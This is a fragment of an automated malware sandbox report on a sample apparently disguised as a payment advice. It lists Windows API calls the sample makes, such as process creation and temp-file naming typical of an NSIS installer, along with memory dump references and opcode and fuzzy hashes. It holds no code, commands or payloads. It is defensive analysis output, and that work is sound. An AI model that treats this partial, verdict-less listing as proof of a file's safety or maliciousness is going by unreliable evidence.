                                                                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                                            • Part of subcall function 00405665: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
                                                                                                                                            • Part of subcall function 00405665: CloseHandle.KERNEL32(?), ref: 00405697
                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                                                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3585118688-0
                                                                                                                                          • Opcode ID: d15ae0a482c79c0d8e7c95f8c2190dddee124483964ec219d5696f0573d40edc
                                                                                                                                          • Instruction ID: 1710045f99402437403c6baccff52884d9c8abed8acdccfc98223cb8aca5cd2d
                                                                                                                                          • Opcode Fuzzy Hash: d15ae0a482c79c0d8e7c95f8c2190dddee124483964ec219d5696f0573d40edc
                                                                                                                                          • Instruction Fuzzy Hash: DC11A171D04204EBCF109FA0CD459DE7AB5EB04318F20447BE505B61E0C3798A82DF99
                                                                                                                                          APIs
                                                                                                                                          • IsWindowVisible.USER32(?), ref: 00405137
                                                                                                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 00405188
                                                                                                                                            • Part of subcall function 0040417B: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418D
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                                          • Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                                                                                                          • Instruction ID: e96fcdb8fef6e8ad8397e3324e9c6cbe2a99463e9dbc89d2689884753c01e048
                                                                                                                                          • Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                                                                                                          • Instruction Fuzzy Hash: 9C019E71A00608AFDF215F11DD84FAB3A26EB84354F104136FA007E2E0C37A8C929E69
                                                                                                                                          APIs
                                                                                                                                          • GetTickCount.KERNEL32 ref: 00405BA3
                                                                                                                                          • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403358,00436000,00436800), ref: 00405BBE
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                                          • String ID: nsa
                                                                                                                                          • API String ID: 1716503409-2209301699
                                                                                                                                          • Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                                                                                                          • Instruction ID: ce32066b90f2dd5c00c4c21114408b385ae8a9c1cc04399698be8057c3d71d7e
                                                                                                                                          • Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                                                                                                          • Instruction Fuzzy Hash: B7F09676A00204BBDB008F59DC05F9BB7B9EB91710F10803AE901F7180E2B0BD40CB64
                                                                                                                                          APIs
                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00405697
                                                                                                                                          Strings
                                                                                                                                          • Error launching installer, xrefs: 00405678
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                          • String ID: Error launching installer
                                                                                                                                          • API String ID: 3712363035-66219284
                                                                                                                                          • Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                                                                                                          • Instruction ID: c7c859a2db999ab7639828e98f3e535764a8332e37e79a8a612d2f3195062982
                                                                                                                                          • Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                                                                                                          • Instruction Fuzzy Hash: 19E0ECB4A01209AFEB009F64EC49A6B7BBCEB00744B908921A914F2250D778E8108A7D
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: fe49718026384e2f2d8d8d283f1539e894bec1c05f027991fc18b2b3d3b0abdf
                                                                                                                                          • Instruction ID: 0bcb7f2cf841bf472a0df6abca0e2eee6c891e9108e2cead3d2ea24e9771fd10
                                                                                                                                          • Opcode Fuzzy Hash: fe49718026384e2f2d8d8d283f1539e894bec1c05f027991fc18b2b3d3b0abdf
                                                                                                                                          • Instruction Fuzzy Hash: D6A15671E00229CBDF28CFA8C854BADBBB1FF44305F15816AD856BB281C7785A96DF44
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 7c1b3bbb7fb5d360c352e29dce0ca82793dba8b39a20caf6091836a7e5acd446
                                                                                                                                          • Instruction ID: 5ff8dc76d646c522b35349404ae71f3a07db7e5a5a41cf42f501ef55767b32d6
                                                                                                                                          • Opcode Fuzzy Hash: 7c1b3bbb7fb5d360c352e29dce0ca82793dba8b39a20caf6091836a7e5acd446
                                                                                                                                          • Instruction Fuzzy Hash: DD913470E04229CBEF28CF98C8547ADBBB1FF44305F15816AD852BB291C7789996DF44
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 06a588dc36723823e64c1d76eb6b79df0e0f5c7b74692a20a357622d355e40c3
                                                                                                                                          • Instruction ID: bb31d40f455f6cff8f0b7d4569728449f81f985eb729d97d8cba9c35205a948c
                                                                                                                                          • Opcode Fuzzy Hash: 06a588dc36723823e64c1d76eb6b79df0e0f5c7b74692a20a357622d355e40c3
                                                                                                                                          • Instruction Fuzzy Hash: A6814471E04228CBDF24CFA8C844BADBBB1FF44305F25816AD456BB281C7789996DF44
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 72aa8ec3dd0942b5b71c471d9b9626f4b4465e3dfbf4f8c787812f56ef585442
                                                                                                                                          • Instruction ID: e59bb743c0d69fedc8ec9c1b53f92d0ee49f9853fc7f4c6d73f4ee5c7875ed1f
                                                                                                                                          • Opcode Fuzzy Hash: 72aa8ec3dd0942b5b71c471d9b9626f4b4465e3dfbf4f8c787812f56ef585442
                                                                                                                                          • Instruction Fuzzy Hash: FE816671E04228DBDF24CFA8C8447ADBBB0FF44305F15816AD856BB281C7786996DF44
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 1d7d6eeb6ae866c31b6fd6fb1bb683d5497ea3b6253a7880f6caf84b5ad72384
                                                                                                                                          • Instruction ID: 9556348457f1f5f1301c48e47fc8538a45dff02eab8277f34011f15b85b09a92
                                                                                                                                          • Opcode Fuzzy Hash: 1d7d6eeb6ae866c31b6fd6fb1bb683d5497ea3b6253a7880f6caf84b5ad72384
                                                                                                                                          • Instruction Fuzzy Hash: 43711271E00228DBDF28CF98C854BADBBB1FF48305F15806AD816BB281C7789996DF54
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 55af2c983f537d9a3a53cfac4a449f3e0c8fe7d310f5448a54a9ff87f60f3244
                                                                                                                                          • Instruction ID: ef61438920200bd82941886013112b5956151ce3a95704f571d29bdd470ffe0d
                                                                                                                                          • Opcode Fuzzy Hash: 55af2c983f537d9a3a53cfac4a449f3e0c8fe7d310f5448a54a9ff87f60f3244
                                                                                                                                          • Instruction Fuzzy Hash: FF713571E00228DBDF28CF98C854BADBBB1FF44305F15806AD856BB291C7789996DF44
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 720b16b0405195766e324cd34a7adf45238a3bda3f5e9f89198b3f7d2eee93b7
                                                                                                                                          • Instruction ID: 0528ad5c4640a45b82c18dce6d1929194436f5f2edf35a138e23b2c729619556
                                                                                                                                          • Opcode Fuzzy Hash: 720b16b0405195766e324cd34a7adf45238a3bda3f5e9f89198b3f7d2eee93b7
                                                                                                                                          • Instruction Fuzzy Hash: AD714671E00228DBDF28CF98C854BADBBB1FF44305F15806AD816BB291C778AA56DF44
                                                                                                                                          APIs
                                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
                                                                                                                                          • lstrcmpiA.KERNEL32(00405CF5,00000000), ref: 00405AE3
                                                                                                                                          • CharNextA.USER32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF4
                                                                                                                                          • lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 190613189-0
                                                                                                                                          • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                                                          • Instruction ID: dad0a046b028959ebe33103b56e1cab2fddac0818810981e259aca52f0e6fc56
                                                                                                                                          • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                                                          • Instruction Fuzzy Hash: 59F06232608558BFC712DFA5DD40D9FBBA8DF06260B2540B6F801F7251D674FE019BA9